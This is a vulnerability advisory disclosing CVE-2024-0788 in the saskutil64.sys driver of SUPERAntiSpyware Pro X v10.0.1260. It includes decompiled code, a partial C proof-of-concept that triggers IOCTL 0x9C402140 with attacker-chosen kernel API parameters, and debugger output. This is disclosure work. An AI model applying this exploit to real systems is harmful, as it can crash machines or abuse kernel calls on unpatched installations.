---
slug: advisories/brubeck/
title: SUPERAntiSpyware Pro X - API manipulation
authors: Andres Roldan
writer: aroldan
codename: brubeck
product: SUPERAntiSpyware Pro X v10.0.1260
date: 2024-01-22 12:00 COT
cveid: CVE-2024-0788
severity: 5.8
description: SUPERAntiSpyware Pro X v10.0.1260 - Kernel-level API parameters manipulation
keywords: Fluid Attacks, Security, Vulnerabilities, DoS, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

| | |
| --------------------- | ---------------------------------------------------------------------------------|
| **Name** | SUPERAntiSpyware Pro X v10.0.1260 - Kernel-level API parameters manipulation |
| **Code name** | [Brubeck](https://en.wikipedia.org/wiki/Dave_Brubeck) |
| **Product** | SUPERAntiSpyware Pro X |
| **Vendor** | SUPERAntiSpyware |
| **Affected versions** | Version 10.0.1260 |
| **State** | Public |
| **Release date** | 2024-01-29 |

## Vulnerability

| | |
| --------------------- | ----------------------------------------------------------------------------------------------------------------------------|
| **Kind** | Kernel-level API parameters manipulation |
| **Rule** | [344. Lack of data validation - Non Sanitized Variables](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-344/) |
| **Remote** | No |
| **CVSSv3 Vector** | CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H |
| **CVSSv3 Base Score** | 5.8 |
| **Exploit available** | Yes |
| **CVE ID(s)** | [CVE-2024-0788](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0788) |

## Description

SUPERAntiSpyware Pro X v10.0.1260 is vulnerable to
kernel-level API parameters manipulation and
Denial of Service vulnerabilities by triggering the
0x9C402140 IOCTL code of the saskutil64.sys
driver.

## Vulnerability

The 0x9C402140 IOCTL code of the saskutil64.sys
driver allows a local attacker to manipulate the
parameters of the `IoGetDeviceObjectPointer` and
`IoBuildSynchronousFsdRequest` kernel-level APIs,
leading to DoS when a invalid Device Object is
passed to `IoGetDeviceObjectPointer`. The primitive
can be further abused to create arbitrary IRPs to
perform driver-to-driver calls.

The decompiled pseudo-code of the affected function is
this:

```c
__int64 __fastcall sub_1110C(__int64 a1, __int64 a2)
{
  unsigned __int64 v2; // rbx
  volatile void *v3; // rcx
  PIRP v4; // rax
  struct _UNICODE_STRING DestinationString; // [rsp+40h] [rbp-48h] BYREF
  struct _IO_STATUS_BLOCK IoStatusBlock; // [rsp+50h] [rbp-38h] BYREF
  struct _KEVENT Event; // [rsp+60h] [rbp-28h] BYREF
  PDEVICE_OBJECT DeviceObject; // [rsp+98h] [rbp+10h] BYREF
  union _LARGE_INTEGER Timeout; // [rsp+A0h] [rbp+18h] BYREF
  PFILE_OBJECT FileObject; // [rsp+A8h] [rbp+20h] BYREF

  v2 = *(_QWORD *)(a2 + 0x18);
  if ( v2 < 0x8000000000000000ui64 )
  {
    ProbeForRead((volatile void *)v2, 0x1018ui64, 1u);
    ProbeForWrite((volatile void *)v2, 0x1018ui64, 1u);
  }
  v3 = *(volatile void **)(v2 + 0x1010);
  if ( (unsigned __int64)v3 < 0x8000000000000000ui64 )
  {
    ProbeForRead(v3, *(unsigned int *)(v2 + 0x1008), 1u);
    ProbeForWrite(*(volatile void **)(v2 + 0x1010), *(unsigned int *)(v2 + 0x1008), 1u);
  }
  RtlInitUnicodeString(&DestinationString, (PCWSTR)v2);
  IoGetDeviceObjectPointer(&DestinationString, 0x80u, &FileObject, &DeviceObject);  // [1]
  Timeout = *(union _LARGE_INTEGER *)(v2 + 0x1000);
  KeInitializeEvent(&Event, NotificationEvent, 0);
  v4 = IoBuildSynchronousFsdRequest(  //[2]
         4u,
         DeviceObject,
         *(PVOID *)(v2 + 0x1010),
         *(_DWORD *)(v2 + 0x1008),
         &Timeout,
         &Event,
         &IoStatusBlock);
  v4->Flags = 0x10;
  if ( IofCallDriver(DeviceObject, v4) == 0x103 )
    KeWaitForSingleObject(&Event, Executive, 0, 0, 0i64);
  return 0i64;
}
```

When an attacker performs a request to the affected
IOCTL, some parameters of [1] and [2] can be influenced.

Snipped of the Proof-of-Concept:

```c
ULONGLONG injectedBufferAddr = 0x00000003a0000000;
...
LPVOID injectedBuffer = VirtualAlloc((LPVOID)injectedBufferAddr, 0x1020, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
...
memset(injectedBuffer, 0x42, 0x1020);
...
// IoGetDeviceObjectPointer->ObjectName
swprintf_s((WCHAR*)inBuf, 13, L"\\Device\\CNG");
// IoBuildSynchronousFsdRequest->StartingOffset
((PDWORD64)((DWORD64)inBuf + 0x1000))[0] = (ULONGLONG)0x1337;
// IoBuildSynchronousFsdRequest->Length
((PDWORD64)((DWORD64)inBuf + 0x1008))[0] = (ULONGLONG)0x200;
// IoBuildSynchronousFsdRequest->Buffer
((PDWORD64)((DWORD64)inBuf + 0x1010))[0] = (ULONGLONG)injectedBuffer;
...
DWORD IoControlCode = 0x9C402140;
...
BOOL triggerIOCTL = DeviceIoControl(hOseeDriver, IoControlCode, (LPVOID)InputBuffer, InputBufferLength, (LPVOID)OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
```

The resulting kernel-level API calls are:

```c
Breakpoint 1 hit
SASKUTIL64+0x11b5:
fffff804`535211b5 ff157d0e0000    call    qword ptr [SASKUTIL64+0x2038 (fffff804`53522038)]

1: kd> dps fffff804`53522038 L1
fffff804`53522038  fffff804`4e80f9f0 nt!IoGetDeviceObjectPointer

1: kd> du poi(rcx+8)
ffff8608`2b4bf000  "\Device\CNG"

Breakpoint 0 hit
SASKUTIL64+0x1216:
fffff804`53521216 ff15f40d0000    call    qword ptr [SASKUTIL64+0x2010 (fffff804`53522010)]

0: kd> dps fffff804`53522010 L1
fffff804`53522010  fffff804`4e858f70 nt!IoBuildSynchronousFsdRequest

0: kd> r rcx; r rdx; r r8; r r9; dps poi(rsp+20) L1; dps poi(rsp+28) L1
rcx=0000000000000004
rdx=ffff860826932c90
r8=00000003a0000000
r9=0000000000000200
ffffa781`aa9e97e0  00000000`00001337
ffffa781`aa9e97a0  00000000`68060000
```

## Our security policy

We have reserved the ID CVE-2024-0788 to refer
to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: SUPERAntiSpyware Pro X v10.0.1260
* Operating System: Windows

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Andres Roldan](https://www.linkedin.com/in/andres-roldan/)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://www.superantispyware.com/>

**Product page** <https://www.superantispyware.com/professional-x-edition.html>

## Timeline

<time-lapse
discovered="2024-01-22"
contacted="2024-01-22"
disclosure="2024-01-29">
</time-lapse>
